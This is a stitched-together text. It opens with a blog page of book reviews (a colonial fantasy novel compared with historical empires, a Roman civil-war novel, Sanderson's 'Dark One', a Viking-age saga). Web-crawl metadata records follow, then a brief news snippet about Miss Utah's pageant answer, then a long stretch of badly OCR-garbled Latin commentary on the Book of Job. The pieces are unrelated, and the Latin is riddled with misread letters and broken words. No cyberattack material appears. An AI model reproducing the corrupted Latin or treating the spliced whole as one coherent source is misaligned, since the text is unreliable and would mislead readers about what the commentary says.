The Balladarians, considering themselves so civilized and think that their architecture is so superior compared to the ‘mud-brick’ architecture that the people of Qazali prefer, that they export marble architecture into the lands of the Qazali. I wonder then, how popular it is. It won’t be. Revolts are brewing in the Shalan Empire’s former colonies. The Balladarians, being as arrogant as ever, refuse to see that their brutal rule is causing the Qazali to form rebellions, striking at their resources, using animals, they are wanting the Balladarians out. Now that’s not a secret in and by itself, the blurb itself tells you that. The Balladarians are in my opinion, the barrier to progress. They are in effect, just like the Ptolemaic Kingdom of Egypt. How? Well when Ptolemy and the Greeks settled in Alexandria and established their new Kingdom, they saw Ancient Egyptians as inferior. They had segregated streets from the Ancient Egyptians, and the Ancient Egyptians lamented, calling upon the fact that they had four thousand years of history. Yet that was all being ignored. I have no doubt the Qazali are feeling the same. And they may call friends from certain places….(One which you’ll be able to figure out!)
Bear in mind, this is a slow-paced military fantasy novel. Once it gets going, its pace is well structured. However, there were some scenes that I felt could have been cut out as it was dragging the story arc sometimes a little too off-tangent. Some scenes could have been shortened when it came to some military battles and more emphasis should have been on twists in my opinion. There are many elements of the novel where you’ll have this fantastic battle scene, or finding out what’s behind XYZ, but then it’ll have other scenes that sometimes could have been used in other areas. Mostly the pacing is fine, but I felt some scenes could have been shortened a bit. There’s a lot of mythology regarding the Qazali and their neighbours. But I felt all of that amazing mythology that is reiterated during this novel could easily be a standalone novel. Easily. There’s so much tantalizing mythology that I would read a standalone novel. That’s where this minor criticism is coming from.
Rogan reminds me of the brutal officers that were sent to the colonies. I remember reading a part in a historical academic book that discussed French colonial rule in Algeria. At one point the story goes that the French had to deal with rebellions. One particular rebellious group ran into the mountains. The Captain ordered the troops to burn the rebels, all of them including families inside a cave. That is how history is sometimes. The Ancient Romans for that matter would have been destroying rebels in North Africa plenty of times, including the Numidians. But I do not see why Rogan would not do the same to the Qazali rebels. He is a dangerous man. Rogan however, needed more emphasis. I wonder what role he will play coming in the sequel.
Touraine is eager to show her loyalty to the Balladarian Empire. That much is evident and is the core focus of Luca’s and Touraine’s chemistry together. However, I compare Touraine’s plight to the other soldiers of the Sands regiment. They are like the Senegalese troops of WWII that were conscripted by France to fight in WWII. They fought with distinction and were in the thick of the fighting during the Battle of France against Germany. However, after the war, they were promised full citizenship and equal rights. Something which took a long time for the French Government to even acknowledge. The concept of citizenship will come up somewhere in this novel. You’ll soon see why. Luca is also acquiring her form of power, her motive to prove that she is worthy to inherit the throne of Balladaria. But of course, gaining power in an empire where a den of snakes infests the political landscape is like a lizard trying to escape that den of snakes before it gets swallowed. Luca is that lizard. She will have to comprehend with more than just people, she’ll have to comprehend with forces beyond her imagination that will test the romantic chemistry of Luca and Touraine’s relationship.
Touraine and Luca’s chemistry are a slow burn but probably for deliberate reasons – to introduce the world that is there. The politics and situation that the story puts on both characters make the romance more realistic, but at the same time, it does show signs of some under-development that could have been improved in pacing areas for that time. But the politics of power proves a mighty strain on both of them, on the personality of their character, and it eventually stems down to this: Touraine and Luca are good people. They want to do good. But the way Colonialism works doesn’t allow good people into its system. Because colonialism was built on the exploitation of other people, and then when good people do come, the system chews it up. Does this refer to all elements of colonialism to be equally worse than the other? Not exactly. Some parts of colonialism did benefit the local natives that betrayed themselves to the foreign powers. Some parts of colonialism had people benefiting from advanced technology. Remember I’m putting a very vague bracket here. I have an Indian background, so of course, I could go and talk about the impact of British rule in India. But that’s not the point. The point is that this novel is showing what colonialism forces people to become: something entirely else.
We could refer to the Ancient World for that matter. What about Parthian Princes that were sent by the Parthian Kings as a sort of exchange to Rome. They were Roman educated and had been brought up in Roman Culture. Then I ask you this. Did they not feel conflicted when it came to proving their loyalty to Rome or Parthia? Did they not go through the same questions that Touraine is forced to go through? This has been happening all the time throughout human history. During the Sengoku Jidai, which was Japan’s massive and brutal civil war in which medieval warlords known as Daimyos would exchange their sons as hostages to each other’s clan. Same thing. Or let’s look at Bernadotte. Marshal Bernadotte is a famous figure in French history. He was the man that Napoleon valued as a General, but often was insubordinate and refused to follow orders.
At one point he was offered the crown of Sweden which has led to the established dynasty of Sweden that is ongoing till today. Moving back to the point, when Napoleon invaded Russia in 1812 to punish Russia and achieve a decisive victory (he was taking the biggest gamble that cost him his empire because of his campaign), Bernadotte made Sweden successful, to say the least. He didn’t like Napoleon’s Continental system, and he had good relations with the Russian Tsar Alexander, during the invasion. Long story short: Bernadotte betrayed Napoleon after the 1812 campaign joining in the Sixth Coalition against Napoleon. Bernadotte taught the allies how to defeat Napoleon. This is just an instance of many outcomes of history where betraying the other side changes the entire outcome of events. It is hard, it is personal, and it is not a pleasant experience to go with when betrayal happens. Many of these historical parallels I’ve just made now relate in some form of manner of the events that will happen within this book. Not a direct comparison, but inspired.
So when you read this book, keep these events in mind. There are many good characters: The evil but cunning Beau-Sang who is a horrible man. The bully of a bully, Captain Rogan who I think needed more character development. Touraine’s mother, Jaghotai whom I didn’t like at all and didn’t agree with her reasoning over her daughter. Djasha and Jaghotai’s wife, were really good characters. The bookseller was awesome. This world is alive. I’ll tell you that. You’ll have Qazali people dancing, drummers drumming the drums, music being played, bread and olives being eaten. A clear distinction is shown between the people of the Qazali and the Balladarians and their neighbors. You’ll figure out which is which, what is what, and how and why everything happens.
Just know that I’m on the side of Touraine, and that I felt Luca’s manipulative chances of forming chemistry with Touraine, to use her as a weapon, as a bridge between Balladarian and Qazali leads to some very interesting outcomes. The writing is so well researched that I feel I’m in a different world many times. I feel as if I’m in the lands of Qazali. There are breath-taking descriptions of Grand Temples, of musket warfare. I think I might have missed a cannon here or there. Every Empire demands a revolution yes? Well, this novel calls for an entire evolution of the outdated concepts that the Balladarians carry about the Qazali, and it demands an entire revolution for the Qazali to remove these Balladarians. Then, of course, not one side is evil nor is bad. That’s what the novel will make you think. The narrator is a very clever character by itself. It makes you feel for each character, it convinces you that one side is right. But I said. Hold on. Not everybody is perfect. Human makes mistakes. We all do. Colonialism is a study of the past. Human history is dark.
But sometimes, we can see the bright spots. Sometimes, hope does come. Anyway, all my historical thoughts are just that, an opinion. Nothing more. I don’t claim to be historically accurate in my review. I’m just drawing parallels to certain moments of history that I’ve read and compared this novel to. This is very much like a Desolation of Peace. In very many senses it is. Also, it is a fantastic novel. Amazing and well-researched writing and the world is alive. I already want a Netflix adaptation of this book. You’ve done an amazing job. C.L. Clark. Fantastic work. The fact you’ve manged to get this student of history draw so many historical parallels is amazing. But the major fact is, you’ve given me a new fantasy world that isn’t medieval Europe and while I do enjoy reading it, this feels like a fresh, new unique world. I can’t wait to read book 2!
It’s a 10/10 from me.
Review: Masters of Rome (Rise of Emperors #2) by Simon Turney and Gordon Doherty
Rating: 10/10
Their rivalry will change the world forever.
As competition for the imperial throne intensifies, Constantine and Maxentius realise their childhood friendship cannot last. Each man struggles to control their respective quadrant of empire, battered by currents of politics, religion and personal tragedy, threatened by barbarian forces and enemies within.
With their positions becoming at once stronger and more troubled, the strained threads of their friendship begin to unravel. Unfortunate words and misunderstandings finally sever their ties, leaving them as bitter opponents in the greatest game of all, with the throne of Rome the prize.
It is a matter that can only be settled by outright war…
Thank you to Aries Fiction, Jade Gwilliam at Head of Zeus, Netgalley, for providing me an ARC via Netgalley. All thoughts and opinions are my own.
This is a monumental triumph detailing the stories of men who brought the downfall of Rome, and those that died trying to save it. The book’s motto says what it does on the tin. The conflict between Emperor Maxentius and Emperor Constantine decided the fate of Western Europe for the next thousand years. The Rise of Christianity which gave shape to the Medieval Era to this very day. This was an intense ramification that we are talking about here, and not much is explored about how early Roman Christianity looked as opposed to its Medieval times. This book perfectly illustrates how Rome’s magnificence fell into ruinous decline. I hardly claim to be an expert on the Crisis of the Third Century, which saw the death of Emperor Septimius Severus result in the Empire’s succession thrive into chaos. Without a proper line of an Imperial family, successive generals took charge, and thus civil war, inflation, taxation, and constant warring from Germanic tribes and the Sassanid Empire weakened Rome’s borders. The Empire itself was a facade. Sure, you had the Empire. But you also had the Senate and the People of Rome. This stretches back to the day of Augustus. What you will see in this book is the complete unraveling of Roman Politics and the herculean task of rebuilding an empire. Diocletian’s reforms brought down the Empire more than it was intended to revive it.
The politics of this period is rife with conspiracy, betrayal and love, loss, and disaster. The religious turmoil of the growing new religion of Christianity in the heart of Rome and Africa, to Gaul and the East of the Roman Provinces, is clearly illustrated. Tensions boil between Roman Paganism and Roman Christianity. Emperor Maxentius has a difficult problem of dealing with the new cult, as it would have looked to him at the time and how Roman Christians themselves weren’t united on a single purpose, having constant and conflicting ideas. Maxentius should be credited as a greater man for Christianity because he indirectly helped and built the foundations of a strong Christian state to take over when Constantine historically assumes the role of Imperator. That’s as much clue you’ll get. In this novel, you’ll explore so many areas of the cities of Rome, Augusta Treverorum, a Roman City in Germania that resembled the capital. You’ll be seeing so much new history it’s like a virtual history tour of a video game for a second. You’ll see Praetorians killing and butchering Romans within the City of Rome. You’ll see generals and emperors at each other’s throats. Confrontations, insults, all the lot you can expect that is associated with Roman Politics. Let it be clear, this is your classic Roman novel. Loyal men fighting to preserve an already collapsing empire. Constantine couldn’t prevent the Empire from falling even when he had a solidified grasp on Rome’s influence. And another thing: When the legions of Rome aren’t paid, they will revolt. That has been a consistent theme within Roman military history for that matter. There are so many emotional scenes written in this book describing the private/personal lives of the two characters, you will tear up.
Old characters make a return and they fit well. Galerius, the man who had set out to become the master of the world becomes a shadow of his former shelf. Maximian, father to Maxentius by his daughter’s marriage, Valeria. These two men who had once participated with Diocletian in the events of the first novel to bring back peace to Rome are shown to have utterly failed. The novel doesn’t need to make that up for you, if you read on the politics of this time, it seems every Emperor and every General was declaring himself Emperor and trying to reclaim Rome all the time. Valeria is one character I never liked, and I still don’t like her. It was a mistake, both in the novel and in real life, for Maxentius to even get married to her. A political marriage is never a trust-worthy alliance of two souls, and in the rare cases that it is, it is a miracle. There is a vibrant and colorful cast of characters, and I also discovered how the Franks, part of the Germanic tribes that were launching wars on Rome all the time, became integrated into Constantine’s army as he defended the Empire from their raids. So by the time, the Empire did officially convert to Christianity, and the Empire split into two, the Western Roman Empire and the Eastern Roman Empire. You already get to see how the Franks soon converted to Christianity and that then formed the Frankish Kingdom, i.e the medieval foundation of France as we know it. But I’ve diverged a bit and gone a bit too ahead for myself. So that’s a fun and cool fact. For all I know I could be wrong.
There’s nail-biting action in this novel, and there’s no shortage of excellent battle scenes. One thing that I did not get was that were the Roman troops still using lorica segmenta and using the equipment of Gallic-style shields, or did they revert to the oval ones that became more popular around the time of this crisis? I did not, and might never like Constantine. I think Maxentius, for all his faults, would have made a better Emperor for Rome. Maxentius was no naive fool. But inside, I felt sadness that with the passing of Emperor Galerius (this being the man who was declining, was the only thing standing between Constantine and Maxentius from declaring war on each other) that these two great men, will soon become enemies. The childhood friendship is over. Now Rome’s destiny will be forged at the battle of the Milvain Bridge, and the fate of Western Civilization is about to be born, anew. I say, without a shadow of a doubt, that Simon Turney and Gordon Doherty, two of my favorite authors, have delivered an outstanding sequel. I feel sad that Maxentius did not become Emperor of Rome however.
10/10 from me.
Rating: 8/10
From #1 New York Times Bestselling, Hugo Award-winning author, Brandon Sanderson (The Mistborn Trilogy, The Stormlight Archive series), along with Nathan Gooden, Jackson Lanzing, and Collin Kelly, comes Dark One, the first book in a series of original graphic novels, from Vault Comics. Some worlds are made to be broken. Paul Tanasin is a young man haunted by visions of a dark and fantastic world?visions he initially believes are hallucinations. But when he discovers they are prophecies from Mirandus, a world in which he’s destined to become a fearsome destroyer, he’ll have to embrace the fear, rise up as the Dark One, and shatter everything. Dark One examines the dual roles we often take on in life-the ability to be a savior as well as a destroyer.
This review contains minor spoilers. You have been warned 😉
I did not want this to end.
This comic was so good that I already was having a blast reading it. Fantastic drawings, fantastic world-building, and the story in itself were easy to follow. It has an epic map cover, one which I want to see more of in this book. There teases of different cultures, and I saw a Roman-Greek-style culture that I wanted to see more of. I’ve loved graphic novels. This is what a graphic novel should be. Fun, easy to read, but it is very brutal in many senses. This is a wonderful introduction to a brand new world and one which I think is worth following. Very well written in my opinion.
The dialogue was very well written. Written by the master writer, Brandon Sanderson and the amazing writers, Lanzing and Kelly, they did a good job of distinguishing the worlds separating themselves from the earth. However, I was not convinced of a few things. First, I understood the concept of the Narrative and how fates and destinies are intertwined. Second, I was unsure of Paul Tanasin was in a sense, able to adapt to situations very quickly, and then becomes kind of adapted into his role. I don’t think he figures out what the clear distinctions are between the light and the dark as of yet, for he has much to learn. Surely, a Dark One can spread light as well? A Dark One does not always need to be evil in my opinion. And what is evil but a reflection of our dark desires? And what is good but a reflection of our good desires? And what happens when the two converge? That I feel is a very interesting arc that should be explored in this brand new series. I felt this area needed more expansion here. Otherwise, the character and worldbuilding was very well done in my opinion
Paul is a good character, but I think he needs to spend time with more characters that can better evoke his personality. The Drull character that serves him is a wonderful addition. His sister’s soul has been with him since his childhood, for example, Sometimes I think the distinctions between the Light and the Dark can become a little too complicated to follow. Paul’s mother is a good character that I think we need more exploration as well. There was a certain backdrop in the comic that I would have wanted to see more development off in my opinion.
213 pages does not cut it. This could have been more longer in my opinion, but I can understand that the reason it is like this is that it’s trying to introduce the reader into the world. I felt that we sped too fast between earth and this new fantastical world of fantasy. Instead, in the next sequel I would want a slower, paced approach and to make Paul’s character witness the events around him in far more detail. There is a bigger world here. There is more of a world to explore, cultures to see. I don’t just want it to be a case of dark vs light, because this comic clearly shows what the grey veil is between dark and light, but I want to explore the world, I want to see what new wonders, what new mysteries I will uncover here. And Krasis – I need more of an explanation with him. I understood he’s a brutal character, but I felt there’s more to uncover about him.
Otherwise, these were just my suggestions. In my opinion, a massive fantasy world like this will take time in successive installaments to introduce more character growth. A fantasy series takes to mature and you can then really get involved. So this is the start of something wonderful. Something really wonderful. I cannot wait to see what else is going to come in this unique universe. 8/10 from me.
Review: Shadow of the Raven (Sons of Kings #1) by Millie Thorn
Shadow of the Raven (Sons of Kings Book 1) eBook: Thom, Millie: Kindle Store
Book Depository
Rating: 10/10
By the mid ninth century, Danish raids on Anglo-Saxon kingdoms have escalated. Several bands even dare to overwinter on the coastal islands, particularly those at the mouth of the Thames, where the kingdoms of Wessex and Mercia border each other. The kings of these lands must put past hostilities aside and take the first steps towards unity; steps they see as vital in the face of this newfound threat to their lands.
Alfred of Wessex and Eadwulf of Mercia are the sons of kings, whose futures have been determined since birth. But the turbulent events in their childhood years change the natural progression of things and shape the characters of the men they will become. Their roads to manhood follow vastly different routes, but both learn crucial lessons along the way: lessons that will serve them well in future years.
Discovering that the enemy is not always a stranger is a harsh lesson indeed; the realisation that a trusted kinsman can turn traitor is the harshest lesson of all.
This story is an emotional saga than anything else. There are dark issues shown in this book that would never be accepted in the 21st century. But as humans, our need for lust, greed, and emotion overwhelm us. I feel sad for many of the characters in this novel. Very sad. This is how brutal times were. Yet in the 21st century, we still have more comforts than the violent 9th century provided us. I have to commened Millie for writing such a good story that I became engrossed with the characters. Especially Eadwulf of Mercia. His story is truly tragic.
Yet, Millie does a very good job of bringing characters that we can relate too, from History’s Viking show, unique characters such as Bjorn, Ivar, Halfdan, Ragnar. Thankfully instead of focusing all five points of view, we get one that is focused on Bjorn. For those that are familiar with Viking history, there are particular raids that happen and there is often the cut-throat Danes selling each other out. Power and Politics play a crucial role within this book. Eadwulf has to navigate through this complex and tricky situation that he will find himself in the course of the novel. Eadwulf’s mother, Morwenna is a character that I like the most. It goes to show that there is nothing more powerful than a mother’s love in this world for her children and she will do anything to protect them. What shames me is that the men in this novel don’t even care for their woman. How stupid it is, to have lived a society of patriarchy for so long that men began to oppress womenhood, when women were the backbone of all society. And how stupid it is, how stupid, that we lived in a society where man and woman could not fall in love so easily. The 21st century is not free of these problems, but we are in a much better situation than what people were subject to in the 8th and 9th century.
There is an epic story buried underneath this saga, and you will find yourself immersed into the breath-taking descriptions, wonderful dialogue, and heart-felt scenes. Many times I was almost close to breaking in tears because of some really powerful scenes. I had to control myself a few times. This is the hallmark of a true writer. There are incredibly historical scenes written, and great action. I was not taken however with Eadwulf’s transition so to say, and his relationship with Sieghelm. I think that could have been more developed, and more scenes should have been added. But it also plays a crucial part in this story. I ended up like Freydis, Alfred, and Bjorn the most. A fantastic start and now I want to review the whole saga. I think this is the start of an epic journey. | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '93', 'language_id_whole_page_fasttext': "{'en': 0.97233247756958}", 'metadata': "{'Content-Length': '127184', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:DOZVH3EJ2MP4N4EU6MZYTCKRANS5QEUH', 'WARC-Concurrent-To': '<urn:uuid:e6e23195-7458-4156-b24d-2bf8b52734a7>', 'WARC-Date': datetime.datetime(2022, 9, 30, 5, 22, 58), 'WARC-IP-Address': '192.0.78.30', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:7EQFXBLDCZBZDHO6AYUVOGFHC67STNEI', 'WARC-Record-ID': '<urn:uuid:7725f637-0e4b-4dfd-99d8-6b980ee755cd>', 'WARC-Target-URI': 'https://alalhambrabookreviews.home.blog/2021/03/', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:43ccad6c-f2cf-426b-8936-56d153a3ccdf>', 'WARC-Truncated': None}", 'previous_word_count': '5310', 'url': 'https://alalhambrabookreviews.home.blog/2021/03/', 'warcinfo': 'isPartOf: CC-MAIN-2022-40\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for September/October 2022\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-67-67-70\r\nsoftware: Apache Nutch 1.19 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.4-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.020915210247039795', 'original_id': '1d5d5746948ab9e9f4c7a80411ce73066c502217e025c63e5605ff5954474eb9'} |
The Wrap
Though Miss Connecticut won the title she didn't necessarily win the popularity contest -- it was Miss Utah who grabbed the most attention on social media. And she sorta won some hearts, but probably for all the wrong reasons.
The answer was a bizarre, rambling comment on education and job creation -- complete with a super long pause, some pity audience applause and a knowing nod from a checked-out Giuliana Rancic. One thing is for sure though -- we do need to create education better, clearly.
View Comments
Recommended for You | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '141', 'language_id_whole_page_fasttext': "{'en': 0.944557249546051}", 'metadata': "{'Content-Length': '259144', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:7DRANJF4CQ5DSST6I6RKZ4MCQJX37YLA', 'WARC-Concurrent-To': '<urn:uuid:ffb56f96-e8bf-45ff-9d4f-ef8347757b65>', 'WARC-Date': datetime.datetime(2013, 12, 9, 5, 48, 1), 'WARC-IP-Address': '206.190.57.61', 'WARC-Identified-Payload-Type': None, 'WARC-Payload-Digest': 'sha1:RYXJMFVOKJTX7QVWQP7J54LDF7GLIYBL', 'WARC-Record-ID': '<urn:uuid:2406af72-0d02-497d-9a4b-d0db89e02956>', 'WARC-Target-URI': 'http://movies.yahoo.com/news/miss-utah-does-not-win-miss-usa-wins-145805858.html', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:969997c5-1d2e-4397-a0fc-ddcb1cc4a039>', 'WARC-Truncated': 'length'}", 'previous_word_count': '222', 'url': 'http://movies.yahoo.com/news/miss-utah-does-not-win-miss-usa-wins-145805858.html', 'warcinfo': 'robots: classic\r\nhostname: ip-10-33-133-15.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2013-48\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web with URLs provided by Blekko for Winter 2013\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.03026759624481201', 'original_id': '38a0a79f95922a620550035a86ff6ccd76b779ce58e5e4fc2845d57aca11d912'} |
V. 12. Dominus autem benedixit noui féimis Job , magis quam principio eius , fec. Sed quaritur, cümalia recepe- tit duplicia , cur non etiam filios & filias ? (ed cos can- tüm recepit eodem numero quo prius? Refpondetur hoc fi&um elle ad tefiificandam. Refürredionem. mortuo- * ido duplum recepit , vt diuus Auguftinus n de j Symbolo ad Catechum. cap. 3. videlicet quia filijems& filiz priores non proríus intetierant , ficut iumenta. eius | & relique. beftiz ; (ed cos an Refurre&ione recepturus erat, Quin & hinc colligitur filios eius & filias quw non eífe damnatas , fed magis in numero eledtorum, Nam fi damnati eifent , tunc etiam ver£ periillent. Sic ergo quod dicitur; Dominas benedixit mouifimis eb, magis quam principio eius , etiam quodammodo gencra- liter tam de filiis & filiabus quam de aliis. polleffioni- bus verum eft. . S A. Verf. T Sie guipo» qui, celat, Septuaginta , celat à te, 3. Àq. d.quife putat poffe abfcondere tibi fua confilia. Ab (que [cientia i imperite feu (tulce, Vos. "PF uditu, c. quafi dicat. te antea tancdm auditione [noucram,nunc veró te docente.Ocuiuj, mens, J'ider.id eft, perfc&tiüscognofcit. Ve6. Ago pormitentiam,& c Scptuaginta , reputaui me ipfum terram & cinerem. 2 V.8 Offerte, Septuaginta, facict,id eft , offeret, fcili« cet lob. Faciem eur fufcipiam, id cft , exaudiam eum, Retum ficut feruns meui. Septasginta, verum contra(er- uum meum, V.9. Snfcepit Dominus faciem lob. Septuaginta foluit eis peccatum propter Iob. V.ro.Comeerfis vt illis parceret, & Iob liberatet cala- mitate, Septuaginta , dimifit illis peccatum, Chald, con- uertit captiuitatem Iob.. V. ar. AMouerunt. fuper eum caput, Scptuaginra,mira- ti funt. Onem. Septuaginta , agnam. Inaurem. fcilicet qua. —MM—M————————— 218 BIBLIA ANNOTATIONVM tuor drachmarum , vt aiunt. Septuaginta.. V.14. Diem.fcilicet ob pulchtitud.nem Heb. Temimah., id eft diuinam. Caffíaw.qua(i dicat, pre:iofam vt cafliam. Cornnfliés, quafi dicat , elegantem. Stibio enim alletua- to in cornu fe fceminz folebanr ornare , fcu fucarc ocu- los. Septuaginta , cornu Amalthez,quaíi dicat , copio- fam, feu diuitem. Vas. Terra fcilicet illa ; vel eft hyperbole. MENOCHIV S. Verf. Vis eft iffequi celat confilium, &c. quafi dicat, 3$ veré ftultiilli (unt, & lapientiz expertes , qui putant fua confilia ita celare (e poffe, vt Deus illa nonco- gnoícat , & putant aliquid eife quod diuinos oculos tugiat. 4dea infipienier loquutus [um.cumn non ita parce, & mo- derate loquutus fam, vt par fuiffet. E V.4.. 2dudi,ch-ego loqnar , &c. Precor vti quid eorum, quz me latent intertogauero,benigné me docere velis. V. $ end idituanris.Sc.quali dicat,ce antea tantum au- ditione noueram,nunc vcróte docente. Ocslas mess "videt te jam perfectiuste agnofco. V.6.. 410 paenitentiam .|tatuo poenitentiam agere eorum quz petcaui, V.7-N.n eflis locutirefum. multa temecé locuti eftis, & iniquam de (ctuo meo (ententiam tuliftis. Sicut ieri ur me-4 lb. in quo prater loquendi modum nihil admodum eft quod reprehendatut. V. 8. Jte ad. erum m:um Job , qui facerdotis munere fungetur. Ojferte, Scptusginta,sfferer. Faciem cus fajcipiam, preceseiusaudiam, V. 10. Conser[. ad p ariitentiam ob , Pagninus ex He- btzo interpretatuse[t, Dominus conserfus efl 4d conuer io uem lob, Vatablus , Dominus convertit. captiuitatem Job. e nu.r(usergo c(t Dominus vt Iobo parceret, illumque ibeza De«ylicia quomodo duplicata fint bonaIob.habemus fe- quentivetficulo r2. Non ftatim factum eft hocincremen- sa bonorum Iobi,ícd breui temporc Domino illobene- icente, Vai. 7Monerunt fuper eum caput. Capitis agitatio , ba- bituseft commiferantis , vt patetex dictiscapite 16. nu- mero 1$. qui affe&tus etiam locum habere poteft cuin agi- ze cumiis,qui dira paffi funt, licet ex malis illis iam emcr- erint. O nem viiam,c inaxrem auream vnam.velut inopi, & ad- huc nihil habenti ; licet pofteacius diuitias Dominus mul- tum auxeric, naurem axream, Scptuagintahabent , tetradrachmum Muri.Inaures ponderis vnius ficli aurei, Va2 Nouffimis F'ob. extrema Iobiztati, v. » Seprem fily cy tres filie, quotfcilicet priushabue- rat. Filiorum numerus duplicatus non eft;quia vc Iob poft £alamitatem duplo ditior factus eft Dci beneficio , ita vo- luit etiam Dorrinus eius filios duplo eífe locupletiores, quàmprimi ill. futuri fuiflenc:quod effe nonpoterat.fi Io- bo poft reftitutam feliciorem fortunam , duplo copiofiot lobolescontigillet. V. 14. Diem, Hebr. np? Zemimab à radice t2 iem, quod eit die; , cumterminatione faeminina , quafi dicas, Diaria, vel Dinrnaita a pellata videtur ob pulchricudi- nem, qua(i decore cum fole contenderet;velà commutata 1n melius forcuna , quod poft tencbras quafiluci , & dici 1cdditus eílet, d Caffiam. quod nomen eftodorsti fruticis , quafi dicat, odorata, pretiofa, grata vtcaffia, Vel quod ex fordibus vl- cerum,& male olcntifimeto,in quo iacuerat,emertillet. Cornsfl ibi. quafi dicat,elegantem. Stibio cnim in cornu afferuato , folebant muliercsfaciem , ac przfertim oculos fucatc. Videtur effe idem ac fi diceretur Italice , Boffilo d; bell:tto, Vide dita 4. Reg.9.30. Aliqui vt Septuaginta ver- tunt, Cormugafoaltbee, quafi diceretur copiofam, feu diui- cm,indican; (e ex paupere rurfus diuitem factum effe. Vg Invniuerfaterra. V el eft hyperbole, vel de regione ^| antumintelligendum;in qua degebat Iob. Hareditarem inter fratrcs, fimul cum fratribusex zquo paternam hzreditatem partitz (unt An hoc factum fic iux» tarcgionis leges,an veró ex priuilegio, facer texcus nonex- prellithoctamen fecundum videtur indicari, TIRINVYVS | Vaf. Vy eff iffe kamaudax, tamperfiidtz frontis,gui $* celat leucelacumetlz putet Dco, aliquod eow/i- lium abíaut fciertia?id cft, rem aliquam abfconfam & fe- cretam elfe , abíque quàd fciat Deus : quafi Deo apetire quis aliqua de nouo , vel illum docere fe poíle (peret. /deo fateor mc valde infipienzer locutum e(le, i2 fequuntur. um dixi Dcoquz V. hdi, cr ego loquar : interrogabo te,cur me ita iudi- ccs, Kc. ce rejponde mibi-) Hac enim verba videri pollent & ab animo plufculum fibi przfidente profecta, & in Deum , quafi non fat gnarum omnium , vel faltem non lac | fingulis attendenzem,iniuriofa. Vnde & me pairet di&to- | rum , & vltro mereprebendo , meamque inícitiam lubens | agnofco : maximé cdm ram prolixa inflcuctione cumet , ó Deus, coram etudite me dignatuscs.Hactenss enim V. s. A dità axris audiui quidem re aliquando , (eu pet internas;feuper excernasinipirationes mecumloquen- tem ; nne atem ma:ore me dignatus esbeneficio ,nempe vtetiam oculus meus videat te. ] fcnfibil; & vifibiliforma mihi przfentem,meque docentem. Vt mirum non fit,om- nia mihi jam clarius certiufqueconftare , meque magis & melius erga te affici quàm anté,ita S. Thomas. Hactenus rythmicé omnia, vt dixi initio cap.3. Quz 1am fcquuntur ptofa confcripta (unc. V. 3. ratus ssi te, C 3n duos «mice: tuor.) Sicctiam in Grzcoeít& Chaldzo.Ancrgonon iracusfuit Deusetiam ! tertio Eliu ? Fuit profe&tó,fcd hominem incredibili faítu, Pferzyr.w, & falfa opinione pienziz turgentem, vti ftatimab initio g, ^ filere iu(lerat Deus initio cap. 38.ita nunc negligit , fafti-| dit,& quafi ignotum praterit,qui bwmslin nibns cal A longé co; meer. ANon ejlHis locutive£ium , freut feruus meus Ib ] Damnat ergo hic Deusamicos quatiqui à fcopo aberrarint : Ioba veró,quia rem acu tetigit,caufam addicit & palmam. Cer- cum enim cft , non folos (celeratos $c Deo exofos ab eo af- fligi in hac vita , quod vrgebantamici , fed etiam pios & (an&os,quod Iobcontendebar.Petulantiusetiam & act o- tibusverbis , quàm deceret incurrerant in afflictum, vnde & iubenturfappliccs illi fieri; & venia ab Iobo petita. pre- ces quoque eius ad Deum profe depoícere. Quod cüm prompto animofaceret Iob, V.9. Sufcepit Dominus faciem Job. ]id eft, exaudiuit pre- ces eiuspro illis fufas.Quin & V. to. fd parnitentiam Job , Pagninus 14d conuerffovem Job, id eft. fimulatque parnituit Iob de fuis dcfe&tibus,ver- Íu fexto & totocordc conuerfuseft ad Deum , fimulque arat proamicis fnis licet erga fe non valdé amicis; incuitu vtriufque tam pij operis , Domiuus quoque conser fus eff, Hebraice & Chaldaicé , Dominu conuertit captiuitatem Job , ideit , Deus àcaptiuitate dzmonis Iobum cxfoluit, nequc ampliusreliquic illum in eiuspoteítate, Hinc & ex omrnbus fuprà di&is patet , non admodum diuturnam fuiffe hancIobiafflictionem, nec nifi paucis menfibus, vc fummum duraffe, Nam amici Iob,fimulatque cis innotuit illius infortunium folandi iuuandique cius caufa adcurre- runt, Difceptatio veró illaomnisquz interceffic , paucis diebus expediri potuit, Difceptationi Deus finemcito im - pofuit , fimulque lobum malis omnibusexemit. Vide quz dixi in Chronico cap. 16, in Éne. Et addidit Dominus omnia quecumque fuerart Iob,dupli- e] Etiam annos vitz, vt ibidem dix!, & Rabbim di- ferte affirmant. Filiorum tamen & filiarum numerum non auxit , quia alioquin ex pecorum & reliquarum opum multiplicatione familia non euafif.t au&ior & ditior, V rt. Cunfis mouerunt fuper ewm caput. partim prz com- paffione, —————————— Tomus 2. er t tait IN LIB. IOB ————————————— CAPVT XL. 219 oaffionc.pattim prat (tupore & admiratione, vt habentSce | A [ felicitacis diem : à pedoread fragrantiam :ex fordiburad ni- pruaginta, V. 14. (Nomen "vnius , feu primz filie , vecauit diem,có ! quód pulchra effet tum corpore, tum mente, inftar fplen- didz dici, Nomen fecude,Caffiam,quàd nobilis & gratiola «ffe inftar acomaticz caffiz Er nomen rertie) Cornuflibi .] rorem, Portó pto cormuflibi Septuaginta vercunt , cornu ] 